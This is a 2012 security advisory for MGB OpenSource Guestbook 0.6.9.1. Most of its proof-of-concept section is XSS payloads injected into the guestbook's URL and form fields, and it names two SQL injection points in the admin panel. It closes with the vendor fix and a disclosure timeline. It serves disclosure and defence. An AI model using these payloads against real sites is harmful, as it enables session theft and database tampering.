Advisory: MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-017
Author: Stefan Schurtz
Affected Software: Successfully tested on MGB OpenSource Guestbook 0.6.9.1
Vendor URL: http://www.m-gb.org
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The MGB OpenSource Guestbook is prone to multiple security vulnerabilities
==================
PoC-Exploit
==================
// XSS
# GET
http://[target]/mgb/index.php?p=1'"</script><script>alert(document.cookie)</script>
# POST
http://[target]/mgb/newentry.php
sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq='"</style></script><script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim='"</style></script><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=='"</style></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"</style></script><script>alert(/xss/)</script>&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&
sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test@local.net&icq='"</style></script><script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test@local.net&icq=&aim='"</style></script><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=='"</style></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"</style></script><script>alert(/xss/)</script>&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1
// SQLi (Admin backend)
http://[target]/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1
http://[target]/mgb/admin/admin.php?action=deactivate&id=[SQLi]&p=1
=========
Solution
=========
Upgrade to the latest version 0.6.9.2
====================
Disclosure Timeline
====================
05-Jul-2012 - developer informed
07-Jul-2012 - feedback from developer
15-Jul-2012 - fixed by developer
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt